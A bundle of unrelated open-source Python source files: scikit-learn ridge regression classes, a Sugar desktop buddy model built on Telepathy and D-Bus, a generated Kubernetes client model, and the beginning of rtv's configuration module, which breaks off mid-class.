solver : {'auto', 'dense_cholesky', 'lsqr', 'sparse_cg'}
Solver to use in the computational routines:
- 'auto' chooses the solver automatically based on the type of data.
- 'dense_cholesky' uses the standard scipy.linalg.solve function to
obtain a closed-form solution.
- 'sparse_cg' uses the conjugate gradient solver as found in
scipy.sparse.linalg.cg. As an iterative algorithm, this solver is
more appropriate than 'dense_cholesky' for large-scale data
(possibility to set `tol` and `max_iter`).
- 'lsqr' uses the dedicated regularized least-squares routine
scipy.sparse.linalg.lsqr. It is the fatest but may not be available
in old scipy versions. It also uses an iterative procedure.
All three solvers support both dense and sparse data.
tol : float
Precision of the solution.
Attributes
----------
`coef_` : array, shape = [n_features] or [n_targets, n_features]
Weight vector(s).
See also
--------
RidgeClassifier, RidgeCV
Examples
--------
>>> from sklearn.linear_model import Ridge
>>> import numpy as np
>>> n_samples, n_features = 10, 5
>>> np.random.seed(0)
>>> y = np.random.randn(n_samples)
>>> X = np.random.randn(n_samples, n_features)
>>> clf = Ridge(alpha=1.0)
>>> clf.fit(X, y) # doctest: +NORMALIZE_WHITESPACE
Ridge(alpha=1.0, copy_X=True, fit_intercept=True, max_iter=None,
normalize=False, solver='auto', tol=0.001)
"""
def __init__(self, alpha=1.0, fit_intercept=True, normalize=False,
copy_X=True, max_iter=None, tol=1e-3, solver="auto"):
super(Ridge, self).__init__(alpha=alpha, fit_intercept=fit_intercept,
normalize=normalize, copy_X=copy_X,
max_iter=max_iter, tol=tol, solver=solver)
def fit(self, X, y, sample_weight=1.0):
"""Fit Ridge regression model
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training data
y : array-like, shape = [n_samples] or [n_samples, n_targets]
Target values
sample_weight : float or numpy array of shape [n_samples]
Individual weights for each sample
Returns
-------
self : returns an instance of self.
"""
return super(Ridge, self).fit(X, y, sample_weight=sample_weight)
class RidgeClassifier(LinearClassifierMixin, _BaseRidge):
"""Classifier using Ridge regression.
Parameters
----------
alpha : float
Small positive values of alpha improve the conditioning of the problem
and reduce the variance of the estimates. Alpha corresponds to
``(2*C)^-1`` in other linear models such as LogisticRegression or
LinearSVC.
class_weight : dict, optional
Weights associated with classes in the form
{class_label : weight}. If not given, all classes are
supposed to have weight one.
copy_X : boolean, optional, default True
If True, X will be copied; else, it may be overwritten.
fit_intercept : boolean
Whether to calculate the intercept for this model. If set to false, no
intercept will be used in calculations (e.g. data is expected to be
already centered).
max_iter : int, optional
Maximum number of iterations for conjugate gradient solver.
The default value is determined by scipy.sparse.linalg.
normalize : boolean, optional
If True, the regressors X are normalized
solver : {'auto', 'dense_cholesky', 'lsqr', 'sparse_cg'}
Solver to use in the computational
routines. 'dense_cholesky' will use the standard
scipy.linalg.solve function, 'sparse_cg' will use the
conjugate gradient solver as found in
scipy.sparse.linalg.cg while 'auto' will chose the most
appropriate depending on the matrix X. 'lsqr' uses
a direct regularized least-squares routine provided by scipy.
tol : float
Precision of the solution.
Attributes
----------
`coef_` : array, shape = [n_features] or [n_classes, n_features]
Weight vector(s).
See also
--------
Ridge, RidgeClassifierCV
Notes
-----
For multi-class classification, n_class classifiers are trained in
a one-versus-all approach. Concretely, this is implemented by taking
advantage of the multi-variate response support in Ridge.
"""
def __init__(self, alpha=1.0, fit_intercept=True, normalize=False,
copy_X=True, max_iter=None, tol=1e-3, class_weight=None,
solver="auto"):
super(RidgeClassifier, self).__init__(
alpha=alpha, fit_intercept=fit_intercept, normalize=normalize,
copy_X=copy_X, max_iter=max_iter, tol=tol, solver=solver)
self.class_weight = class_weight
def fit(self, X, y):
"""Fit Ridge regression model.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples,n_features]
Training data
y : array-like, shape = [n_samples]
Target values
Returns
-------
self : returns an instance of self.
"""
if self.class_weight is None:
class_weight = {}
else:
class_weight = self.class_weight
sample_weight_classes = np.array([class_weight.get(k, 1.0) for k in y])
self._label_binarizer = LabelBinarizer(pos_label=1, neg_label=-1)
Y = self._label_binarizer.fit_transform(y)
super(RidgeClassifier, self).fit(X, Y,
sample_weight=sample_weight_classes)
return self
@property
def classes_(self):
return self._label_binarizer.classes_
class _RidgeGCV(LinearModel):
"""Ridge regression with built-in Generalized Cross-Validation
It allows efficient Leave-One-Out cross-validation.
This class is not intended to be used directly. Use RidgeCV instead.
Notes
-----
We want to solve (K + alpha*Id)c = y,
where K = X X^T is the kernel matrix.
Let G = (K + alpha*Id)^-1.
Dual solution: c = Gy
Primal solution: w = X^T c
Compute eigendecomposition K = Q V Q^T.
Then G = Q (V + alpha*Id)^-1 Q^T,
where (V + alpha*Id) is diagonal.
It is thus inexpensive to inverse for many alphas.
Let loov be the vector of prediction values for each example
when the model was fitted with all examples but this example.
loov = (KGY - diag(KG)Y) / diag(I-KG)
Let looe be the vector of prediction errors for each example
when the model was fitted with all examples but this example.
looe = y - loov = c / diag(G)
References
----------
http://cbcl.mit.edu/projects/cbcl/publications/ps/MIT-CSAIL-TR-2007-025.pdf
http://www.mit.edu/~9.520/spring07/Classes/rlsslides.pdf
"""
def __init__(self, alphas=[0.1, 1.0, 10.0], fit_intercept=True,
normalize=False, score_func=None, loss_func=None,
copy_X=True, gcv_mode=None, store_cv_values=False):
self.alphas = np.asarray(alphas)
self.fit_intercept = fit_intercept
self.normalize = normalize
self.score_func = score_func
self.loss_func = loss_func
self.copy_X = copy_X
self.gcv_mode = gcv_mode
self.store_cv_values = store_cv_values
def _pre_compute(self, X, y):
# even if X is very sparse, K is usually very dense
K = safe_sparse_dot(X, X.T, dense_output=True)
v, Q = linalg.eigh(K)
QT_y = np.dot(Q.T, y)
return v, Q, QT_y
def _decomp_diag(self, v_prime, Q):
# compute diagonal of the matrix: dot(Q, dot(diag(v_prime), Q^T))
return (v_prime * Q ** 2).sum(axis=-1)
def _diag_dot(self, D, B):
# compute dot(diag(D), B)
if len(B.shape) > 1:
# handle case where B is > 1-d
D = D[(slice(None), ) + (np.newaxis, ) * (len(B.shape) - 1)]
return D * B
def _errors(self, alpha, y, v, Q, QT_y):
# don't construct matrix G, instead compute action on y & diagonal
w = 1.0 / (v + alpha)
c = np.dot(Q, self._diag_dot(w, QT_y))
G_diag = self._decomp_diag(w, Q)
# handle case where y is 2-d
if len(y.shape) != 1:
G_diag = G_diag[:, np.newaxis]
return (c / G_diag) ** 2, c
def _values(self, alpha, y, v, Q, QT_y):
# don't construct matrix G, instead compute action on y & diagonal
w = 1.0 / (v + alpha)
c = np.dot(Q, self._diag_dot(w, QT_y))
G_diag = self._decomp_diag(w, Q)
# handle case where y is 2-d
if len(y.shape) != 1:
G_diag = G_diag[:, np.newaxis]
return y - (c / G_diag), c
def _pre_compute_svd(self, X, y):
if sparse.issparse(X) and hasattr(X, 'toarray'):
X = X.toarray()
U, s, _ = np.linalg.svd(X, full_matrices=0)
v = s ** 2
UT_y = np.dot(U.T, y)
return v, U, UT_y
def _errors_svd(self, alpha, y, v, U, UT_y):
w = ((v + alpha) ** -1) - (alpha ** -1)
c = np.dot(U, self._diag_dot(w, UT_y)) + (alpha ** -1) * y
G_diag = self._decomp_diag(w, U) + (alpha ** -1)
if len(y.shape) != 1:
# handle case where y is 2-d
G_diag = G_diag[:, np.newaxis]
return (c / G_diag) ** 2, c
def _values_svd(self, alpha, y, v, U, UT_y):
w = ((v + alpha) ** -1) - (alpha ** -1)
c = np.dot(U, self._diag_dot(w, UT_y)) + (alpha ** -1) * y
G_diag = self._decomp_diag(w, U) + (alpha ** -1)
if len(y.shape) != 1:
# handle case when y is 2-d
G_diag = G_diag[:, np.newaxis]
return y - (c / G_diag), c
def fit(self, X, y, sample_weight=1.0):
"""Fit Ridge regression model
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training data
y : array-like, shape = [n_samples] or [n_samples, n_targets]
Target values
sample_weight : float or array-like of shape [n_samples]
Sample weight
Returns
-------
self : Returns self.
"""
X = safe_asarray(X, dtype=np.float)
y = np.asarray(y, dtype=np.float)
n_samples, n_features = X.shape
X, y, X_mean, y_mean, X_std = LinearModel._center_data(
X, y, self.fit_intercept, self.normalize, self.copy_X,
sample_weight=sample_weight)
gcv_mode = self.gcv_mode
with_sw = len(np.shape(sample_weight))
if gcv_mode is None or gcv_mode == 'auto':
if n_features > n_samples or with_sw:
gcv_mode = 'eigen'
else:
gcv_mode = 'svd'
elif gcv_mode == "svd" and with_sw:
# FIXME non-uniform sample weights not yet supported
warnings.warn("non-uniform sample weights unsupported for svd, "
"forcing usage of eigen")
gcv_mode = 'eigen'
if gcv_mode == 'eigen':
_pre_compute = self._pre_compute
_errors = self._errors
_values = self._values
elif gcv_mode == 'svd':
# assert n_samples >= n_features
_pre_compute = self._pre_compute_svd
_errors = self._errors_svd
_values = self._values_svd
else:
raise ValueError('bad gcv_mode "%s"' % gcv_mode)
v, Q, QT_y = _pre_compute(X, y)
n_y = 1 if len(y.shape) == 1 else y.shape[1]
cv_values = np.zeros((n_samples * n_y, len(self.alphas)))
C = []
error = self.score_func is None and self.loss_func is None
for i, alpha in enumerate(self.alphas):
if error:
out, c = _errors(sample_weight * alpha, y, v, Q, QT_y)
else:
out, c = _values(sample_weight * alpha, y, v, Q, QT_y)
cv_values[:, i] = out.ravel()
C.append(c)
if error:
best = cv_values.mean(axis=0).argmin()
else:
func = self.score_func if self.score_func else self.loss_func
out = [func(y.ravel(), cv_values[:, i])
for i in range(len(self.alphas))]
best = np.argmax(out) if self.score_func else np.argmin(out)
self.alpha_ = self.alphas[best]
self.dual_coef_ = C[best]
self.coef_ = safe_sparse_dot(self.dual_coef_.T, X)
self._set_intercept(X_mean, y_mean, X_std)
if self.store_cv_values:
if len(y.shape) == 1:
cv_values_shape = n_samples, len(self.alphas)
else:
cv_values_shape = n_samples, n_y, len(self.alphas)
self.cv_values_ = cv_values.reshape(cv_values_shape)
return self
class _BaseRidgeCV(LinearModel):
def __init__(self, alphas=np.array([0.1, 1.0, 10.0]),
fit_intercept=True, normalize=False, score_func=None,
loss_func=None, cv=None, gcv_mode=None,
store_cv_values=False):
self.alphas = alphas
self.fit_intercept = fit_intercept
self.normalize = normalize
self.score_func = score_func
self.loss_func = loss_func
self.cv = cv
self.gcv_mode = gcv_mode
self.store_cv_values = store_cv_values
def fit(self, X, y, sample_weight=1.0):
"""Fit Ridge regression model
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training data
y : array-like, shape = [n_samples] or [n_samples, n_targets]
Target values
sample_weight : float or array-like of shape [n_samples]
Sample weight
Returns
-------
self : Returns self.
"""
if self.cv is None:
estimator = _RidgeGCV(self.alphas,
fit_intercept=self.fit_intercept,
normalize=self.normalize,
score_func=self.score_func,
loss_func=self.loss_func,
gcv_mode=self.gcv_mode,
store_cv_values=self.store_cv_values)
estimator.fit(X, y, sample_weight=sample_weight)
self.alpha_ = estimator.alpha_
if self.store_cv_values:
self.cv_values_ = estimator.cv_values_
else:
if self.store_cv_values:
raise ValueError("cv!=None and store_cv_values=True "
" are incompatible")
parameters = {'alpha': self.alphas}
# FIXME: sample_weight must be split into training/validation data
# too!
#fit_params = {'sample_weight' : sample_weight}
fit_params = {}
gs = GridSearchCV(Ridge(fit_intercept=self.fit_intercept),
parameters, fit_params=fit_params, cv=self.cv)
gs.fit(X, y)
estimator = gs.best_estimator_
self.alpha_ = gs.best_estimator_.alpha
self.coef_ = estimator.coef_
self.intercept_ = estimator.intercept_
return self
class RidgeCV(_BaseRidgeCV, RegressorMixin):
"""Ridge regression with built-in cross-validation.
By default, it performs Generalized Cross-Validation, which is a form of
efficient Leave-One-Out cross-validation.
Parameters
----------
alphas: numpy array of shape [n_alphas]
Array of alpha values to try.
Small positive values of alpha improve the conditioning of the
problem and reduce the variance of the estimates.
Alpha corresponds to ``(2*C)^-1`` in other linear models such as
LogisticRegression or LinearSVC.
fit_intercept : boolean
Whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional
If True, the regressors X are normalized
score_func: callable, optional
function that takes 2 arguments and compares them in
order to evaluate the performance of prediction (big is good)
if None is passed, the score of the estimator is maximized
loss_func: callable, optional
function that takes 2 arguments and compares them in
order to evaluate the performance of prediction (small is good)
if None is passed, the score of the estimator is maximized
cv : cross-validation generator, optional
If None, Generalized Cross-Validation (efficient Leave-One-Out)
will be used.
gcv_mode : {None, 'auto', 'svd', eigen'}, optional
Flag indicating which strategy to use when performing
Generalized Cross-Validation. Options are::
'auto' : use svd if n_samples > n_features, otherwise use eigen
'svd' : force computation via singular value decomposition of X
'eigen' : force computation via eigendecomposition of X^T X
The 'auto' mode is the default and is intended to pick the cheaper \
option of the two depending upon the shape of the training data.
store_cv_values : boolean, default=False
Flag indicating if the cross-validation values corresponding to
each alpha should be stored in the `cv_values_` attribute (see
below). This flag is only compatible with `cv=None` (i.e. using
Generalized Cross-Validation).
Attributes
----------
`cv_values_` : array, shape = [n_samples, n_alphas] or \
shape = [n_samples, n_targets, n_alphas], optional
Cross-validation values for each alpha (if `store_cv_values=True` and \
`cv=None`). After `fit()` has been called, this attribute will \
contain the mean squared errors (by default) or the values of the \
`{loss,score}_func` function (if provided in the constructor).
`coef_` : array, shape = [n_features] or [n_targets, n_features]
Weight vector(s).
`alpha_` : float
Estimated regularization parameter.
See also
--------
Ridge: Ridge regression
RidgeClassifier: Ridge classifier
RidgeClassifierCV: Ridge classifier with built-in cross validation
"""
pass
class RidgeClassifierCV(LinearClassifierMixin, _BaseRidgeCV):
"""Ridge classifier with built-in cross-validation.
By default, it performs Generalized Cross-Validation, which is a form of
efficient Leave-One-Out cross-validation. Currently, only the n_features >
n_samples case is handled efficiently.
Parameters
----------
alphas: numpy array of shape [n_alphas]
Array of alpha values to try.
Small positive values of alpha improve the conditioning of the
problem and reduce the variance of the estimates.
Alpha corresponds to (2*C)^-1 in other linear models such as
LogisticRegression or LinearSVC.
fit_intercept : boolean
Whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional
If True, the regressors X are normalized
score_func: callable, optional
function that takes 2 arguments and compares them in
order to evaluate the performance of prediction (big is good)
if None is passed, the score of the estimator is maximized
loss_func: callable, optional
function that takes 2 arguments and compares them in
order to evaluate the performance of prediction (small is good)
if None is passed, the score of the estimator is maximized
cv : cross-validation generator, optional
If None, Generalized Cross-Validation (efficient Leave-One-Out)
will be used.
class_weight : dict, optional
Weights associated with classes in the form
{class_label : weight}. If not given, all classes are
supposed to have weight one.
Attributes
----------
`cv_values_` : array, shape = [n_samples, n_alphas] or \
shape = [n_samples, n_responses, n_alphas], optional
Cross-validation values for each alpha (if `store_cv_values=True` and
`cv=None`). After `fit()` has been called, this attribute will contain \
the mean squared errors (by default) or the values of the \
`{loss,score}_func` function (if provided in the constructor).
`coef_` : array, shape = [n_features] or [n_targets, n_features]
Weight vector(s).
`alpha_` : float
Estimated regularization parameter
See also
--------
Ridge: Ridge regression
RidgeClassifier: Ridge classifier
RidgeCV: Ridge regression with built-in cross validation
Notes
-----
For multi-class classification, n_class classifiers are trained in
a one-versus-all approach. Concretely, this is implemented by taking
advantage of the multi-variate response support in Ridge.
"""
def __init__(self, alphas=np.array([0.1, 1.0, 10.0]), fit_intercept=True,
normalize=False, score_func=None, loss_func=None, cv=None,
class_weight=None):
super(RidgeClassifierCV, self).__init__(
alphas=alphas, fit_intercept=fit_intercept, normalize=normalize,
score_func=score_func, loss_func=loss_func, cv=cv)
self.class_weight = class_weight
def fit(self, X, y, sample_weight=1.0, class_weight=None):
"""Fit the ridge classifier.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples
and n_features is the number of features.
y : array-like, shape = [n_samples]
Target values.
sample_weight : float or numpy array of shape [n_samples]
Sample weight
Returns
-------
self : object
Returns self.
"""
if self.class_weight is not None:
get_cw = self.class_weight.get
sample_weight = (sample_weight
* np.array([get_cw(k, 1.0) for k in y]))
self._label_binarizer = LabelBinarizer(pos_label=1, neg_label=-1)
Y = self._label_binarizer.fit_transform(y)
_BaseRidgeCV.fit(self, X, Y, sample_weight=sample_weight)
return self
@property
def classes_(self):
return self._label_binarizer.classes_
|
|
# Copyright (C) 2006-2007 Red Hat, Inc.
# Copyright (C) 2010 Collabora Ltd. <http://www.collabora.co.uk/>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import logging
import dbus
from telepathy.client import Connection
from telepathy.interfaces import CONNECTION
from .xocolor import XoColor
import connection_watcher
from gi.repository import GObject
CONNECTION_INTERFACE_BUDDY_INFO = 'org.laptop.Telepathy.BuddyInfo'
_owner_instance = None
class BaseBuddyModel(GObject.GObject):
__gtype_name__ = 'SugarBaseBuddyModel'
def __init__(self, **kwargs):
self._key = None
self._nick = None
self._color = None
self._tags = None
self._current_activity = None
GObject.GObject.__init__(self, **kwargs)
def get_nick(self):
return self._nick
def set_nick(self, nick):
self._nick = nick
nick = GObject.property(type=object, getter=get_nick, setter=set_nick)
def get_key(self):
return self._key
def set_key(self, key):
self._key = key
key = GObject.property(type=object, getter=get_key, setter=set_key)
def get_color(self):
return self._color
def set_color(self, color):
self._color = color
color = GObject.property(type=object, getter=get_color, setter=set_color)
def get_tags(self):
return self._tags
tags = GObject.property(type=object, getter=get_tags)
def get_current_activity(self):
return self._current_activity
def set_current_activity(self, current_activity):
if self._current_activity != current_activity:
self._current_activity = current_activity
self.notify('current-activity')
current_activity = GObject.property(type=object,
getter=get_current_activity,
setter=set_current_activity)
def is_owner(self):
raise NotImplementedError
class OwnerBuddyModel(BaseBuddyModel):
__gtype_name__ = 'SugarOwnerBuddyModel'
def __init__(self):
BaseBuddyModel.__init__(self)
self.props.nick = "rgs"
self.props.color = XoColor(None)
# self.props.key = get_profile().pubkey
self.props.key = "foobar"
self.connect('notify::nick', self.__property_changed_cb)
self.connect('notify::color', self.__property_changed_cb)
self.connect('notify::current-activity',
self.__current_activity_changed_cb)
bus = dbus.SessionBus()
bus.add_signal_receiver(
self.__name_owner_changed_cb,
signal_name='NameOwnerChanged',
dbus_interface='org.freedesktop.DBus')
bus_object = bus.get_object(dbus.BUS_DAEMON_NAME, dbus.BUS_DAEMON_PATH)
for service in bus_object.ListNames(
dbus_interface=dbus.BUS_DAEMON_IFACE):
if service.startswith(CONNECTION + '.'):
path = '/%s' % service.replace('.', '/')
Connection(service, path, bus,
ready_handler=self.__connection_ready_cb)
def __connection_ready_cb(self, connection):
self._sync_properties_on_connection(connection)
def __name_owner_changed_cb(self, name, old, new):
if name.startswith(CONNECTION + '.') and not old and new:
path = '/' + name.replace('.', '/')
Connection(name, path, ready_handler=self.__connection_ready_cb)
def __property_changed_cb(self, buddy, pspec):
self._sync_properties()
def __current_activity_changed_cb(self, buddy, pspec):
conn_watcher = connection_watcher.get_instance()
for connection in conn_watcher.get_connections():
if self.props.current_activity is not None:
activity_id = self.props.current_activity.activity_id
room_handle = self.props.current_activity.room_handle
else:
activity_id = ''
room_handle = 0
connection[CONNECTION_INTERFACE_BUDDY_INFO].SetCurrentActivity(
activity_id,
room_handle,
reply_handler=self.__set_current_activity_cb,
error_handler=self.__error_handler_cb)
def __set_current_activity_cb(self):
logging.debug('__set_current_activity_cb')
def _sync_properties(self):
conn_watcher = connection_watcher.get_instance()
for connection in conn_watcher.get_connections():
self._sync_properties_on_connection(connection)
def _sync_properties_on_connection(self, connection):
if CONNECTION_INTERFACE_BUDDY_INFO in connection:
properties = {}
if self.props.key is not None:
properties['key'] = dbus.ByteArray(self.props.key)
if self.props.color is not None:
properties['color'] = self.props.color.to_string()
logging.debug('calling SetProperties with %r', properties)
connection[CONNECTION_INTERFACE_BUDDY_INFO].SetProperties(
properties,
reply_handler=self.__set_properties_cb,
error_handler=self.__error_handler_cb)
def __set_properties_cb(self):
logging.debug('__set_properties_cb')
def __error_handler_cb(self, error):
raise RuntimeError(error)
def __connection_added_cb(self, conn_watcher, connection):
self._sync_properties_on_connection(connection)
def is_owner(self):
return True
def get_owner_instance():
global _owner_instance
if _owner_instance is None:
_owner_instance = OwnerBuddyModel()
return _owner_instance
class BuddyModel(BaseBuddyModel):
__gtype_name__ = 'SugarBuddyModel'
def __init__(self, **kwargs):
self._account = None
self._contact_id = None
self._handle = None
BaseBuddyModel.__init__(self, **kwargs)
def is_owner(self):
return False
def get_account(self):
return self._account
def set_account(self, account):
self._account = account
account = GObject.property(type=object, getter=get_account,
setter=set_account)
def get_contact_id(self):
return self._contact_id
def set_contact_id(self, contact_id):
self._contact_id = contact_id
contact_id = GObject.property(type=object, getter=get_contact_id,
setter=set_contact_id)
def get_handle(self):
return self._handle
def set_handle(self, handle):
self._handle = handle
handle = GObject.property(type=object, getter=get_handle,
setter=set_handle)
|
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: release-1.23
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kubernetes.client.configuration import Configuration
class V1ReplicationControllerCondition(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'last_transition_time': 'datetime',
'message': 'str',
'reason': 'str',
'status': 'str',
'type': 'str'
}
attribute_map = {
'last_transition_time': 'lastTransitionTime',
'message': 'message',
'reason': 'reason',
'status': 'status',
'type': 'type'
}
def __init__(self, last_transition_time=None, message=None, reason=None, status=None, type=None, local_vars_configuration=None): # noqa: E501
"""V1ReplicationControllerCondition - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._last_transition_time = None
self._message = None
self._reason = None
self._status = None
self._type = None
self.discriminator = None
if last_transition_time is not None:
self.last_transition_time = last_transition_time
if message is not None:
self.message = message
if reason is not None:
self.reason = reason
self.status = status
self.type = type
@property
def last_transition_time(self):
"""Gets the last_transition_time of this V1ReplicationControllerCondition. # noqa: E501
The last time the condition transitioned from one status to another. # noqa: E501
:return: The last_transition_time of this V1ReplicationControllerCondition. # noqa: E501
:rtype: datetime
"""
return self._last_transition_time
@last_transition_time.setter
def last_transition_time(self, last_transition_time):
"""Sets the last_transition_time of this V1ReplicationControllerCondition.
The last time the condition transitioned from one status to another. # noqa: E501
:param last_transition_time: The last_transition_time of this V1ReplicationControllerCondition. # noqa: E501
:type: datetime
"""
self._last_transition_time = last_transition_time
@property
def message(self):
"""Gets the message of this V1ReplicationControllerCondition. # noqa: E501
A human readable message indicating details about the transition. # noqa: E501
:return: The message of this V1ReplicationControllerCondition. # noqa: E501
:rtype: str
"""
return self._message
@message.setter
def message(self, message):
"""Sets the message of this V1ReplicationControllerCondition.
A human readable message indicating details about the transition. # noqa: E501
:param message: The message of this V1ReplicationControllerCondition. # noqa: E501
:type: str
"""
self._message = message
@property
def reason(self):
"""Gets the reason of this V1ReplicationControllerCondition. # noqa: E501
The reason for the condition's last transition. # noqa: E501
:return: The reason of this V1ReplicationControllerCondition. # noqa: E501
:rtype: str
"""
return self._reason
@reason.setter
def reason(self, reason):
"""Sets the reason of this V1ReplicationControllerCondition.
The reason for the condition's last transition. # noqa: E501
:param reason: The reason of this V1ReplicationControllerCondition. # noqa: E501
:type: str
"""
self._reason = reason
@property
def status(self):
"""Gets the status of this V1ReplicationControllerCondition. # noqa: E501
Status of the condition, one of True, False, Unknown. # noqa: E501
:return: The status of this V1ReplicationControllerCondition. # noqa: E501
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this V1ReplicationControllerCondition.
Status of the condition, one of True, False, Unknown. # noqa: E501
:param status: The status of this V1ReplicationControllerCondition. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and status is None: # noqa: E501
raise ValueError("Invalid value for `status`, must not be `None`") # noqa: E501
self._status = status
@property
def type(self):
"""Gets the type of this V1ReplicationControllerCondition. # noqa: E501
Type of replication controller condition. # noqa: E501
:return: The type of this V1ReplicationControllerCondition. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this V1ReplicationControllerCondition.
Type of replication controller condition. # noqa: E501
:param type: The type of this V1ReplicationControllerCondition. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and type is None: # noqa: E501
raise ValueError("Invalid value for `type`, must not be `None`") # noqa: E501
self._type = type
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1ReplicationControllerCondition):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V1ReplicationControllerCondition):
return True
return self.to_dict() != other.to_dict()
|
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
import codecs
import shutil
import argparse
from functools import partial
import six
from six.moves import configparser
from . import docs, __version__
from .objects import KeyMap
PACKAGE = os.path.dirname(__file__)
HOME = os.path.expanduser('~')
TEMPLATES = os.path.join(PACKAGE, 'templates')
DEFAULT_CONFIG = os.path.join(TEMPLATES, 'rtv.cfg')
DEFAULT_MAILCAP = os.path.join(TEMPLATES, 'mailcap')
DEFAULT_THEMES = os.path.join(PACKAGE, 'themes')
XDG_CONFIG_HOME = os.getenv('XDG_CONFIG_HOME', os.path.join(HOME, '.config'))
XDG_DATA_HOME = os.getenv('XDG_DATA_HOME', os.path.join(HOME, '.local', 'share'))
CONFIG = os.path.join(XDG_CONFIG_HOME, 'rtv', 'rtv.cfg')
MAILCAP = os.path.join(HOME, '.mailcap')
TOKEN = os.path.join(XDG_DATA_HOME, 'rtv', 'refresh-token')
HISTORY = os.path.join(XDG_DATA_HOME, 'rtv', 'history.log')
THEMES = os.path.join(XDG_CONFIG_HOME, 'rtv', 'themes')
def build_parser():
parser = argparse.ArgumentParser(
prog='rtv', description=docs.SUMMARY,
epilog=docs.CONTROLS,
usage=docs.USAGE,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument(
'link', metavar='URL', nargs='?',
help='[optional] Full URL of a submission to open')
parser.add_argument(
'-s', dest='subreddit',
help='Name of the subreddit that will be loaded on start')
parser.add_argument(
'-l', dest='link_deprecated',
help=argparse.SUPPRESS) # Deprecated, use the positional arg instead
parser.add_argument(
'--log', metavar='FILE', action='store',
help='Log HTTP requests to the given file')
parser.add_argument(
'--config', metavar='FILE', action='store',
help='Load configuration settings from the given file')
parser.add_argument(
'--ascii', action='store_const', const=True,
help='Enable ascii-only mode')
parser.add_argument(
'--monochrome', action='store_const', const=True,
help='Disable color')
parser.add_argument(
'--theme', metavar='FILE', action='store',
help='Color theme to use, see --list-themes for valid options')
parser.add_argument(
'--list-themes', metavar='FILE', action='store_const', const=True,
help='List all of the available color themes')
parser.add_argument(
'--non-persistent', dest='persistent', action='store_const', const=False,
help='Forget the authenticated user when the program exits')
parser.add_argument(
'--no-autologin', dest='autologin', action='store_const', const=False,
help='Do not authenticate automatically on startup')
parser.add_argument(
'--clear-auth', dest='clear_auth', action='store_const', const=True,
help='Remove any saved user data before launching')
parser.add_argument(
'--copy-config', dest='copy_config', action='store_const', const=True,
help='Copy the default configuration to {HOME}/.config/rtv/rtv.cfg')
parser.add_argument(
'--copy-mailcap', dest='copy_mailcap', action='store_const', const=True,
help='Copy an example mailcap configuration to {HOME}/.mailcap')
parser.add_argument(
'--enable-media', dest='enable_media', action='store_const', const=True,
help='Open external links using programs defined in the mailcap config')
parser.add_argument(
'-V', '--version', action='version', version='rtv ' + __version__)
parser.add_argument(
'--no-flash', dest='flash', action='store_const', const=False,
help='Disable screen flashing')
parser.add_argument(
'--debug-info', dest='debug_info', action='store_const', const=True,
help='Show system and environment information and exit')
return parser
def copy_default_mailcap(filename=MAILCAP):
"""
Copy the example mailcap configuration to the specified file.
"""
return _copy_settings_file(DEFAULT_MAILCAP, filename, 'mailcap')
def copy_default_config(filename=CONFIG):
"""
Copy the default rtv user configuration to the specified file.
"""
return _copy_settings_file(DEFAULT_CONFIG, filename, 'config')
def _copy_settings_file(source, destination, name):
"""
Copy a file from the repo to the user's home directory.
"""
if os.path.exists(destination):
try:
ch = six.moves.input(
'File %s already exists, overwrite? y/[n]):' % destination)
if ch not in ('Y', 'y'):
return
except KeyboardInterrupt:
return
filepath = os.path.dirname(destination)
if not os.path.exists(filepath):
os.makedirs(filepath)
print('Copying default %s to %s' % (name, destination))
shutil.copy(source, destination)
os.chmod(destination, 0o664)
class OrderedSet(object):
"""
A simple implementation of an ordered set. A set is used to check
for membership, and a list is used to maintain ordering.
"""
def __init__(self, elements=None):
elements = elements or []
self._set = set(elements)
self._list = elements
def __contains__(self, item):
